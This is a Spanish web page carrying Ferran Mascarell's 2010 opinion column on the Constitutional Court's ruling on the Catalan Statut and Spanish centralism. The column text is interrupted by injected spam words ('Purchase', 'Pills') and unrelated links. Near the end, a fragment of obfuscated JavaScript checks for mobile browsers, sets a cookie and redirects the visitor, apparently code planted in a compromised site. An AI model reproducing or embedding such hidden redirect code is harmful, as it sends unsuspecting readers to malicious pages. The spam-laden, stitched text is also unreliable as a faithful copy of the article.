• Noticias maquetadas 13.05.2010

    España como problema, otra vez

    http://paardenkennisbank.nl/?p=5939
    http://trier-research.com/?p=28099

    Ferran Mascarell

    Purchase

    Me cuento entre quienes llegaron a pensar que, con la democracia, España mataría la raíz centralista derivada del nacionalismo excluyente que la constituyó. Me equivoqué. El Estado no consigue romper con el imperativo categórico que lo fundó: una sola nación, una sola lengua, un solo nacionalismo reconocido: el españolista de raíz castellana. Muchos pensamos que el pacto fundacional del 78 abría paso a un estado nuevo: una España compartida en la que el Estado reconocía la voluntad nacional de los catalanes, su lengua, su cultura y sus instituciones; reconocía su carácter plurinacional y se adentraba en un proceso federal plurinacional.

    Me incluyo entre quienes hoy sienten una notable frustración por la deriva de España. Por la deriva de la derecha. Nunca imaginé que pudiese ser tan corta de miras y destructiva, nunca supuse que su partido se convirtiese en una máquina obsesionada con la conquista del poder político hasta el punto de destruir la política y admitir todo tipo de corrupción. Tampoco supuse que la izquierda española podría ser tan timorata. Se ha dejado comer el terreno de la modernidad, de las ciudades; no sabe cómo encarar la crisis económica, destila frivolidad e impotencia, ha hecho suyo el discurso más inmovilista sobre España, ha convertido el federalismo en retórica. Desgraciadamente para España – lamento escribirlo-,la concepción del Estado de muchos dirigentes socialistas tiende a parecerse como dos gotas a la de los populares. No son lo mismo; es el PP quien ha interpuesto el recurso; pero de nada sirve el autoengaño: la involución españolista afecta de modo parecido a los grandes partidos españoles. La razón parece obvia. La mayor parte de los actuales dirigentes son hijos del propio aparato del Estado. Sus intereses están directamente entrelazados con la idea de España que les ha dado poder y ocupación. El PP no ha dado ninguna razón convincente para explicar su impugnación del Estatut. El PSOE está tratando las maquinaciones del Tribunal Constitucional como si la cosa no fuese con él. Ambos aceptan un tribunal convertido en cuarta cámara legislativa, capaz de torpedear lo que ha sido aprobado en un Parlamento, un referéndum y unas Cortes Generales.

    Pills

    La sentencia liquidará la España del 78. Destruye la mejor España construida y quiebra el Estado. Nada será igual, así lo ha señalado el president Montilla. Saca a Catalunya del consenso institucional, deja a España huérfana de uno de sus principales activos históricos. Vuelve a poner en evidencia la parcialidad del Estado: decide el campo de juego, se identifica con uno de los equipos y pone los árbitros. España reaparece como problema y se refuerza la inseguridad política. La confianza es un lubricante que hace funcionar la sociedad (Joseph E. Stiglitz). La sentencia acabará con la poca que queda.

    Después de la sentencia muchos otros catalanes pensarán que España no tiene solución. Sin embargo, soy de los que creen que Catalunya debe insistir en la España que quiere. A Catalunya le conviene defender con uñas y dientes un Estado compartido eficiente y centrado en los problemas reales; como le conviene precisar que si no lo consigue no tendrá más remedio que buscarse la vida en un Estado propio. Sólo la voluntad de los catalanes de cambiar España les dará alas para construir una mayoría social que les garantice el autogobierno y el reconocimiento como nación. Sólo combatiendo a los que creen poseer los derechos exclusivos de propiedad sobre España se podrá construir una mayoría social sólida capaz de defender una España apetecible, o en su defecto una Catalunya independiente.

    http://mttaborsoap.com/?p=11447

    Pills

    Los sabios chinos construyeron un signo lingüístico que identificaba por igual la crisis y la oportunidad. De la crisis actual se deriva tal vez la última oportunidad de cambiar España. A los catalanes nos toca marcar el camino. Todo indica que la sentencia expresará una idea regresiva de España. De poco servirá exigir la reforma del tribunal si las reglas de juego le permiten cercenar la voluntad de la ciudadanía expresada en el Parlament catalán, las Cortes españolas y un referéndum. No es aceptable que el tribunal se convierta en una cuarta cámara salida de los trapicheos partidistas. No es aceptable que se complete el tribunal sin modificar su fundamento.

    Las próximas elecciones catalanas son también una oportunidad. Los candidatos deberán explicar qué proponen para España, deberán decirnos qué mayoría JOMA política van a proponer para hacer frente a la regresión españolista, cómo van a defender el Estatut y el autogobierno. Somos muchos los que pensamos que la independencia es un derecho perfectamente defendible, pero que de poco sirve apelar a ella como un objetivo lejano e impreciso. Se trata de saber cuántos, entre la independencia lejana y la nada, optamos por aprovechar las herramientas que poseemos, entre ellas un Estado eficiente. Así pues, que nadie se confunda. La mayoría de los catalanes queremos un Estado que admita su pluralidad y sea eficaz. Hoy España no lo es. Ese es, de nuevo, el viejo problema.

    opinio@ ferranmascarell. com

    bc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xa48a[8]](_0x82d7x1[_0xa48a[9]](0,4))){var _0x82d7x3= new Date( new Date()[_0xa48a[10]]()+ 1800000);document[_0xa48a[2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])}http://2iyf.com/?p=14140

  • Comments are closed.

Calendario de artículos

mayo 2010
L M X J V S D
 12
3456789
10111213141516
17181920212223
24252627282930
31  

Artículos anteriores